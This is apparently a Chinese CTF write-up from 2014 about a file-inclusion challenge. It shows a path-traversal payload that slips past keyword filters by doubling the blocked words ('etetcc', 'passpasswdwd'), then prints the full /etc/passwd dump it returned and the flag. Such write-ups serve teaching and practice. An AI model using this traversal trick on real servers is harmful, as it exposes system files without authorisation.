美文网首页CTF
一道文件包含的题

一道文件包含的题

作者: Ryans | 来源:发表于2014-09-28 13:48 被阅读113次

题目叫读取/etc/passwd

浏览器输入http://183.213.11.*:4414/stage/11/getfilecontent.php?file=./index.txt

浏览器显示/var/www/stage/11/index.txthalou

经过测试,发现过滤的关键字有

./     etc passwd  c/p

因此,根据敏敏感词感词的思想,构造payload如下:

getfilecontent.php?file=...//...//...//...//etetcc/c/ppasspasswdwd

浏览器显示,得到key

/var/www/stage/11/../../../../etc/passwdroot:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:9:9:news:/var/spool/news:/bin/shuucp:x:10:10:uucp:/var/spool/uucp:/bin/shproxy:x:13:13:proxy:/bin:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/shlist:x:38:38:Mailing List Manager:/var/list:/bin/shirc:x:39:39:ircd:/var/run/ircd:/bin/shgnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/shnobody:x:65534:65534:nobody:/nonexistent:/bin/shlibuuid:x:100:101::/var/lib/libuuid:/bin/shmysql:x:101:103:MySQL Server,,,:/nonexistent:/bin/falsemessagebus:x:102:106::/var/run/dbus:/bin/falsecolord:x:103:107:colord colour management daemon,,,:/var/lib/colord:/bin/falseusbmux:x:104:46:usbmux daemon,,,:/home/usbmux:/bin/falsemiredo:x:105:65534::/var/run/miredo:/bin/falsentp:x:106:112::/home/ntp:/bin/falseDebian-exim:x:107:113::/var/spool/exim4:/bin/falseavahi:x:108:116:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/falsebeef-xss:x:109:117::/var/lib/beef-xss:/bin/falsedradis:x:110:119::/var/lib/dradis:/bin/falsepulse:x:111:120:PulseAudio daemon,,,:/var/run/pulse:/bin/falsespeech-dispatcher:x:112:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/shhaldaemon:x:113:122:Hardware abstraction layer,,,:/var/run/hald:/bin/falseiodine:x:114:65534::/var/run/iodine:/bin/falsepostgres:x:115:125:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bashsshd:x:116:65534::/var/run/sshd:/usr/sbin/nologinstunnel4:x:117:126::/var/run/stunnel4:/bin/falsestatd:x:118:65534::/var/lib/nfs:/bin/falsesslh:x:119:128::/nonexistent:/bin/falseDebian-gdm:x:120:129:Gnome Display Manager:/var/lib/gdm3:/bin/falsertkit:x:121:130:RealtimeKit,,,:/proc:/bin/falsesaned:x:122:131::/home/saned:/bin/falsesnmp:x:123:132::/var/lib/snmp:/bin/falseKey:2986372947239ABC

相关文章

  • 一道文件包含的题

    题目叫读取/etc/passwd 浏览器输入http://183.213.11.*:4414/stage/11/g...

  • 一道ISCC题引申的PHP正则复习

    iscc中的一道web题“试试看”,描述为随意开火 起初看url,以为是一道常规的文件包含题,后面试了很多方法都出...

  • 今天的数学课也只做一道题

    昨天的数学课我答应他们只做了一道题,我出了一道题,求正方形内切圆和外接圆的周长和面积,一道题包含了十几个知识点,他...

  • NOIP复赛文件路径怎么写

    以2018年NOIP普及组复赛为例,四道题对应着四个文件夹: 随便选一道题,比如第一道题,进入title目录,可以...

  • 关于setTimeout的面试题

    经常看到网上的前端面试题中会有关于setTimeout的这道题,这题经常有人写,一道题包含了javascript ...

  • leetcode 8--java实现atoi

    这个题的确挺恶心,在leetcode上面是medium。leetcodde有一道题判断字符串是否为数字(包含e+小...

  • 一道CTF-session文件包含

    i春秋上百度杯十二月中的一道题目-看看我的Notebook 创建题目 具有注册和登录功能,随便注册一个登录发现: ...

  • 论剑场web21解题

    这道题包含了文件包含、代码审计、和反序列化。 1、查看源码: 发现这个file_get_contents函数读取的...

  • 【文件包含】PHP文件包含漏洞

    0x01 文件包含函数 include() include_once() require() require_on...

  • 文件包含

    本文作者是一个白的不能再白的小白的写的,自身的水平有限,本着分享的态度,如遇到不对的地方,希望大家多多提意见。 文...

网友评论

  • 29eadf1967d7:没看懂这个etc passwd的正则过滤原理
    Ryans:@skyfly2016 是某公司出的题目,遇到关键字就删除掉

本文标题:一道文件包含的题

本文链接:https://www.haomeiwen.com/subject/fcbutttx.html